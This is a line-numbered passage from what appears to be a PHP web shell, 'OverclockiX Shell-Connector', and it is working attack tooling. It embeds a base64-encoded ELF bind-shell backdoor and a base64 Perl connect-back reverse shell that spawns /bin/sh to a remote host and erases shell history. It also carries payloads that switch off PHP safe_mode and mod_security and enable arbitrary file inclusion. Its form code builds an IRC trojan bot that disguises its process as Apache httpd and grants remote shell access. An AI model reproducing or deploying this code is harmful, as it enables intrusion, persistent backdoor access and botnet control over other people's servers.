mMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAAAIlEJASLRfCJBCToKP7//4XAeRjHBCSTiQQI6Kj9///HBCQBAAAA6Bz+///HRCQECAAAAItF8IkEJOi5/f//hcB5GMcEJJiJBAjoef3//8cEJAEAAADo7f3//8dF6BAAAACNReiNVcSJRCQIiVQkBItF8IkEJOht/f//iUX0g330AHkMxwQkjIkECOg4/f//6EP9//+FwA+EpwAAAItF+Ln/////iUW4uAAAAAD8i3248q6JyPfQg+gBx0QkDAAAAACJRCQIi0X4iUQkBItF9IkEJOiQ/f//x0QkBAAAAACLRfSJBCToPf3//8dEJAQBAAAAi0X0iQQk6Cr9///HRCQEAgAAAItF9IkEJOgX/f//x0QkCAAAAADHRCQEn4kECMcEJJ+JBAjoe/z//4tF8IkEJOiA/P//xwQkAAAAAOgE/f//i0X0iQQk6Gn8///pDv///1WJ5VdWMfZT6H/9//+BwyMSAACD7AzoEfz//42DIP///42TIP///4lF8CnQwfgCOcZzFonX/xSyi0Xwg8YBKfiJ+sH4AjnGcuyDxAxbXl9dw1WJ5YPsGIld9Ogt/f//gcPREQAAiXX4iX38jbMg////jbsg////Kf7B/gLrA/8Ut4PuAYP+/3X16DoAAACLXfSLdfiLffyJ7F3DkFWJ5VOD7AShrJkECIP4/3QSu6yZBAj/0ItD/IPrBIP4/3Xzg8QEW13DkJCQVYnlU+i7/P//gcNfEQAAg+wE6LH8//+DxARbXcMAAAADAAAAAQACADo6IHc0Y2sxbmctc2hlbGwgKFByaXZhdGUgQnVpbGQgdjAuMykgYmluZCBzaGVsbCBiYWNrZG9vciA6OiAKCgBzb2NrZXQAYmluZABsaXN0ZW4AL2Jpbi9zaAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAACQAAAAMAAAAiIQECA0AAAAkiQQIBAAAAEiBBAgFAAAAEIMECAYAAADggQQICgAAALAAAAALAAAAEAAAABUAAAAAAAAAAwAAAIyaBAgCAAAAeAAAABQAAAARAAAAFwAAABCEBAgRAAAACIQECBIAAAAIAAAAEwAAAAgAAAD+//9v6IMECP///28BAAAA8P//b8CDBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwJkECAAAAAAAAAAAtoQECMaEBAjWhAQI5oQECPaEBAgGhQQIFoUECCaFBAg2hQQIRoUECFaFBAhmhQQIdoUECIaFBAiWhQQIAAAAAAAAAAC4mQQIAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAAAcAAAAAgAAAAAABAAAAAAAoIUECCIAAAAAAAAAAAAAADQAAAACAAsBAAAEAAAAAADohQQIBAAAACSJBAgSAAAAiIQECAsAAADEhQQIJAAAAAAAAAAAAAAALAAAAAIAmwEAAAQAAAAAAOiFBAgEAAAAO4kECAYAAACdhAQIAgAAAAAAAAAAAAAAIQAAAAIAegAAAJEAAAB5AAAAX0lPX3N0ZGluX3VzZWQAAAAAAHYAAAACAAAAAAAEAQAAAACghQQIwoUECC4uL3N5c2RlcHMvaTM4Ni9lbGYvc3RhcnQuUwAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvZ2xpYmMtMi4zLjYvY3N1AEdOVSBBUyAyLjE2LjkxAAGAjQAAAAIAFAAAAAQBWwAAAMSFBAjEhQQIYgAAAAEAAAAAEQAAAAKQAAAABAcCVAAAAAEIAp0AAAACBwKLAAAABAcCVgAAAAEGAgcAAAACBQNpbnQABAUCRgAAAAgFAoYAAAAIBwJLAAAABAUCkAAAAAQHAl0AAAABBgSwAAAAARmLAAAAAQUDSIkECAVPAAAAAIwAAAACAFYAAAAEAYIAAAAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdS9jcnRpLlMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgIwAAAACAGYAAAAEAS8BAAAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdS9jcnRuLlMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgAERABAGEQESAQMIGwglCBMFAAAAAREBEAYSAREBJQ4TCwMOGw4AAAIkAAMOCws+CwAAAyQAAwgLCz4LAAAENAADDjoLOwtJEz8MAgoAAAUmAEkTAAAAAREAEAYDCBsIJQgTBQAAAAERABAGAwgbCCUIEwUAAABXAAAAAgAyAAAAAQH7Dg0AAQEBAQAAAAEAAAEuLi9zeXNkZXBzL2kzODYvZWxmAABzdGFydC5TAAEAAAAABQKghQQIA8AAATMhND0lIgMYIFlaISJcWwIBAAEBIwAAAAIAHQAAAAEB+w4NAAEBAQEAAAABAAABAGluaXQuYwAAAAAAqQAAAAIAUAAAAAEB+w4NAAEBAQEAAAABAAABL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UAAGNydGkuUwABAAAAAAUC6IUECAPAAAE9AgEAAQEABQIkiQQIAy4BIS8hWWcCAwABAQAFAoiEBAgDHwEhLz0CBQABAQAFAsSFBAgDCgEhLyFZZz1nLy8wPSEhAgEAAQGIAAAAAgBQAAAAAQH7Dg0AAQEBAQAAAAEAAAEvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdQAAY3J0bi5TAAEAAAAABQLohQQIAyEBPQIBAAEBAAUCO4kECAMSAT0hIQIBAAEBAAUCnYQECAMJASECAQABAWluaXQuYwBzaG9ydCBpbnQAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBsb25nIGxvbmcgaW50AHVuc2lnbmVkIGNoYXIAR05VIEMgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAbG9uZyBsb25nIHVuc2lnbmVkIGludABzaG9ydCB1bnNpZ25lZCBpbnQAX0lPX3N0ZGluX3VzZWQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmludGVycAAubm90ZS5BQkktdGFnAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5keW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAuZGVidWdfYXJhbmdlcwAuZGVidWdfcHVibmFtZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfc3RyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAAFIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAAAAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAJgAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsAAAACAAAA4IEECOABAAAwAQAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAABCDBAgQAwAAsAAAAAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAADAgwQIwAMAACYAAAAEAAAAAAAAAAIAAAACAAAAVAAAAP7//28CAAAA6IMECOgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAAAiEBAgIBAAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAAAQhAQIEAQAAHgAAAAEAAAACwAAAAQAAAAIAAAAdQAAAAEAAAAGAAAAiIQECIgEAAAXAAAAAAAAAAAAAAABAAAAAAAAAHAAAAABAAAABgAAAKCEBAigBAAAAAEAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAACghQQIoAUAAIQDAAAAAAAAAAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAJIkECCQJAAAdAAAAAAAAAAAAAAABAAAAAAAAAIcAAAABAAAAAgAAAESJBAhECQAAYwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAIAAACoiQQIqAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAmQAAAAEAAAADAAAArJkECKwJAAAIAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAABAAAAAwAAALSZBAi0CQAACAAAAAAAAAAAAAAABAAAAAAAAACnAAAAAQAAAAMAAAC8mQQIvAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAArAAAAAYAAAADAAAAwJkECMAJAADIAAAABQAAAAAAAAAEAAAACAAAALUAAAABAAAAAwAAAIiaBAiICgAABAAAAAAAAAAAAAAABAAAAAQAAAC6AAAAAQAAAAMAAACMmgQIjAoAAEgAAAAAAAAAAAAAAAQAAAAEAAAAwwAAAAEAAAADAAAA1JoECNQKAAAMAAAAAAAAAAAAAAAEAAAAAAAAAMkAAAAIAAAAAwAAAOCaBAjgCgAABAAAAAAAAAAAAAAABAAAAAAAAADOAAAAAQAAAAAAAAAAAAAA4AoAACYBAAAAAAAAAAAAAAEAAAAAAAAA1wAAAAEAAAAAAAAAAAAAAAgMAACIAAAAAAAAAAAAAAAIAAAAAAAAAOYAAAABAAAAAAAAAAAAAACQDAAAJQAAAAAAAAAAAAAAAQAAAAAAAAD2AAAAAQAAAAAAAAAAAAAAtQwAACsCAAAAAAAAAAAAAAEAAAAAAAAAAgEAAAEAAAAAAAAAAAAAAOAOAAB2AAAAAAAAAAAAAAABAAAAAAAAABABAAABAAAAAAAAAAAAAABWDwAAuwEAAAAAAAAAAAAAAQAAAAAAAAAcAQAAAQAAADAAAAAAAAAAEREAAL8AAAAAAAAAAAAAAAEAAAABAAAAEQAAAAMAAAAAAAAAAAAAANARAAAnAQAAAAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAABIGAAA8AUAACEAAAA/AAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAAOB4AALIDAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAAAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAADggQQIAAAAAAMABAAAAAAAEIMECAAAAAADAAUAAAAAAMCDBAgAAAAAAwAGAAAAAADogwQIAAAAAAMABwAAAAAACIQECAAAAAADAAgAAAAAABCEBAgAAAAAAwAJAAAAAACIhAQIAAAAAAMACgAAAAAAoIQECAAAAAADAAsAAAAAAKCFBAgAAAAAAwAMAAAAAAAkiQQIAAAAAAMADQAAAAAARIkECAAAAAADAA4AAAAAAKiJBAgAAAAAAwAPAAAAAACsmQQIAAAAAAMAEAAAAAAAtJkECAAAAAADABEAAAAAALyZBAgAAAAAAwASAAAAAADAmQQIAAAAAAMAEwAAAAAAiJoECAAAAAADABQAAAAAAIyaBAgAAAAAAwAVAAAAAADUmgQIAAAAAAMAFgAAAAAA4JoECAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAADABoAAAAAAAAAAAAAAAAAAwAbAAAAAAAAAAAAAAAAAAMAHAAAAAAAAAAAAAAAAAADAB0AAAAAAAAAAAAAAAAAAwAeAAAAAAAAAAAAAAAAAAMAHwAAAAAAAAAAAAAAAAADACAAAAAAAAAAAAAAAAAAAwAhAAEAAAAAAAAAAAAAAAQA8f8MAAAAAAAAAAAAAAAEAPH/KAAAAAAAAAAAAAAABADx/y8AAAAAAAAAAAAAAAQA8f86AAAAAAAAAAAAAAAEAPH/dAAAAMSFBAgAAAAAAgAMAIQAAAAAAAAAAAAAAAQA8f+PAAAArJkECAAAAAABABAAnQAAALSZBAgAAAAAAQARAKsAAAC8mQQIAAAAAAEAEgC4AAAA4JoECAEAAAABABcAxwAAANyaBAgAAAAAAQAWAM4AAADshQQIAAAAAAIADADkAAAAG4YECAAAAAACAAwAhAAAAAAAAAAAAAAABADx//AAAACwmQQIAAAAAAEAEAD9AAAAuJkECAAAAAABABEACgEAAKiJBAgAAAAAAQAPABgBAAC8mQQIAAAAAAEAEgAkAQAA+IgECAAAAAACAAwALwAAAAAAAAAAAAAABADx/zoBAAAAAAAAAAAAAAQA8f90AQAAAAAAAAAAAAAEAPH/eAEAAMCZBAgAAAAAAQITAIEBAACsmQQIAAAAAAAC8f+SAQAArJkECAAAAAAAAvH/pQEAAKyZBAgAAAAAAALx/7YBAACMmgQIAAAAAAECFQDMAQAArJkECAAAAAAAAvH/3wEAAAAAAAB1AQAAEgAAAPABAAAAAAAAcQAAABIAAAABAgAARIkECAQAAAARAA4ACAIAAAAAAADMAAAAEgAAABoCAAAAAAAAWgAAABIAAAAqAgAA2JoECAAAAAARAhYANwIAAK2IBAhKAAAAEgAMAEcCAAAAAAAAeAAAABIAAABZAgAAiIQECAAAAAASAAoAXwIAAAAAAAA5AAAAEgAAAHECAAAAAAAAOQAAABIAAACHAgAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
2565 $back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0=";
2566 $php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
2567 $htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
2568 $sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
2569 if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname']))
2570 {
2571 $ircadmin=$_POST['ircadmin'];
2572 $ircserver=$_POST['ircserver'];
2573 $ircchan=$_POST['ircchanal'];
2574 $irclabel=$_POST['ircname'];
2575 echo "<title>OverclockiX Shell-Connector || Connecting to $ircserver<title>";
2576 echo "<body bgcolor=\"black\" text=\"green\">";
2577 echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
2578 echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
2579 
2580 ###
2581 ###
2582 ###
2583 ###
2584 ###
2585 ###
2586 ###
2587 ###
2588 ###
2589 ###
2590 ###
2591 ###
2592 ###
2593 ###
2594 ###
2595 ###
2596 ###
2597 ###
2598 ###
2599 ###
2600 ###
2601 ###
2602 ###
2603 ###
2604 ###
2605 ###
2606 ####
2607 
2608 ###
2609 ###
2610 ###
2611 ###
2612 ###
2613 ###
2614 ###
2615 ###
2616 ###
2617 ###
2618 ###IRC Trojan
2619 ###
2620 ###
2621 ###
2622 ###
2623 ###
2624 ###
2625 ###
2626 ###
2627 ###
2628 ###
2629 ###
2630 ###
2631 ###
2632 $file="
2633 
2634 ###
2635 ###
2636 ###
2637 ###
2638 ###
2639 ###
2640 ###
2641 ### CONFIGURACAO 
2642 ###
2643 ###
2644 ###
2645 ###
2646 ###
2647 ###
2648 ###
2649 ###
2650 ###
2651 ###
2652 ###
2653 ###
2654 ###
2655 ###
2656 ###
2657 ###
2658 ###
2659 ###
2660 ###
2661 ###
2662 ###
2663 ###
2664 ###
2665 ###
2666 ###
2667 ###
2668 ###
2669 ###
2670 ###
2671 ###
2672 ###
2673 ####
2674 my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
2675 #----------------------------------------------
2676 ###
2677 ###
2678 ###
2679 ###
2680 ###
2681 ###
2682 ###
2683 ###
2684 ###
2685 ###
2686 ###
2687 ###
2688 ###
2689 ###
2690 ###
2691 ###
2692 ###
2693 ###
2694 ###
2695 ###
2696 ###
2697 ###
2698 ###
2699 ###
2700 my \$linas_max='48'; # Evita o flood <img src="/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /> depois de X linhas #
2701 #----------------------------------------------
2702 ###
2703 ###
2704 ###
2705 ###
2706 ###
2707 ###
2708 ###
2709 ###
2710 ###
2711 ###
2712 ###
2713 ###
2714 ###
2715 ###
2716 ###
2717 ###
2718 ###
2719 ###
2720 ###
2721 ###
2722 ###
2723 ###
2724 ###
2725 ###
2726 my \$sleep='4'; # ele dorme X segundos #
2727 
2728 ###
2729 ###
2730 ###
2731 ###
2732 ###
2733 ###
2734 ###
2735 ###
2736 ###
2737 #### IRC 
2738 ###
2739 ###
2740 ###
2741 ###
2742 ###
2743 ###
2744 ###
2745 ###
2746 ###
2747 ###
2748 ###
2749 ###
2750 ###
2751 ###
2752 ###
2753 ###
2754 ###
2755 ###
2756 ###
2757 ###
2758 ###
2759 ###
2760 ###
2761 ###
2762 ###
2763 ###
2764 ###
2765 ###
2766 ###
2767 ###
2768 ###
2769 ###
2770 ###
2771 ####
2772 my @adms=(\"$ircadmin\"); # Nick do administrador #
2773 #----------------------------------------------
2774 ###
2775 ###
2776 ###
2777 ###
2778 ###
2779 ###
2780 ###
2781 ###
2782 ###
2783 ###
2784 ###
2785 ###
2786 ###
2787 ###
2788 ###
2789 ###
2790 ###
2791 ###
2792 ###
2793 ###
2794 ###
2795 ###
2796 ###
2797 ###
2798 my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
2799 #----------------------------------------------
2800 ###
2801 ###
2802 ###
2803 ###
2804 ###
2805 ###
2806 ###
2807 ###
2808 ###
2809 ###
2810 ###
2811 ###
2812 ###
2813 ###
2814 ###
2815 ###
2816 ###
2817 ###
2818 ###
2819 ###
2820 ###
2821 ###
2822 ###
2823 ###
2824 my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
2825                                                # aparecer com numero radonamico no final #
2826 #----------------------------------------------
2827 ###
2828 ###
2829 ###
2830 ###
2831 ###
2832 ###
2833 ###
2834 ###
2835 ###
2836 ###
2837 ###
2838 ###
2839 ###
2840 ###
2841 ###
2842 ###
2843 ###
2844 ###
2845 ###
2846 ###
2847 ###
2848 ###
2849 ###
2850 ###
2851 my \$ircname = 'Linux'; # User ID #
2852 #----------------------------------------------
2853 ###
2854 ###
2855 ###
2856 ###
2857 ###
2858 ###
2859 ###
2860 ###
2861 ###
2862 ###
2863 ###
2864 ###
2865 ###
2866 ###
2867 ###
2868 ###
2869 ###
2870 ###
2871 ###
2872 ###
2873 ###
2874 ###
2875 ###
2876 ###
2877 chop (my \$realname = `uname -a`); # Full Name #
2878 #----------------------------------------------
2879 ###
2880 ###
2881 ###
2882 ###
2883 ###
2884 ###
2885 ###
2886 ###
2887 ###
2888 ###
2889 ###
2890 ###
2891 ###
2892 ###
2893 ###
2894 ###
2895 ###
2896 ###
2897 ###
2898 ###
2899 ###
2900 ###
2901 ###
2902 ###
2903 \$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
2904                                                # caso n?o seja especificado no argumento #
2905 #----------------------------------------------
2906 ###
2907 ###
2908 ###
2909 ###
2910 ###
2911 ###
2912 ###
2913 ###
2914 ###
2915 ###
2916 ###
2917 ###
2918 ###
2919 ###
2920 ###
2921 ###
2922 ###
2923 ###
2924 ###
2925 ###
2926 ###
2927 ###
2928 ###
2929 ###
2930 my \$porta='6667'; # Porta do servidor de irc #
2931 
2932 ###
2933 ###
2934 ###
2935 ###
2936 ###
2937 ###
2938 ###
2939 ### ACESSO A SHELL 
2940 ###
2941 ###
2942 ###
2943 ###
2944 ###
2945 ###
2946 ###
2947 ###
2948 ###
2949 ###
2950 ###
2951 ###
2952 ###
2953 ###
2954 ###
2955 ###
2956 ###
2957 ###
2958 ###
2959 ###
2960 ###
2961 ###
2962 ###
2963 ###
2964 ###
2965 ###
2966 ###
2967 ###
2968 ###
2969 ###
2970 ####
2971 my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
2972 
2973 ###
2974 ###
2975 ###
2976 ###
2977 ###
2978 ###
2979 ###
2980 ###
2981 ###
2982 ###
2983 ###
2984 ###
2985 ###
2986 ###
2987 ###
2988 ###
2989 ###
2990 ###
2991 ###
2992 ###
2993 ###
2994 ###
2995 ###
2996 ###
2997 ###
2998 ###
2999 ###
3000 ###
3001 ###
3002 ###
3003 ###
3004 ###
3005 ###
3006 ###
3007 ###
3008 ###
3009 ###
3010 ###
3011 ###
3012 ###
3013 ###
3014 ###
3015 ###
3016 ###
3017 ###
3018 ###
3019 ####
